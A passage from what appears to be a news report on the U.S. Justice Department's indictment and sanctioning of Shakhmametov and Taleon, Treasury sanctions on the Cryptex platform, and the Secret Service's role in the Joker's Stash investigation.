    The DOJ’s indictment of Shakhmametov and Taleon is part of a broader international effort to curb cybercrime. In addition to the indictments, the U.S. has imposed sanctions on both individuals, effectively cutting them off from the global financial system. The U.S. Treasury Department has also sanctioned Cryptex, targeting the platform’s operations and preventing its use for further money laundering.

    The U.S. Secret Service, which led the investigation into Joker’s Stash, has played a critical role in both operations. This agency, originally founded to combat counterfeiting, has adapted its mission over the years to address the growing threat of financial cybercrime. The DOJ credits their expertise in tracking illicit financial activity as instrumental in bringing these cybercriminals to justice.

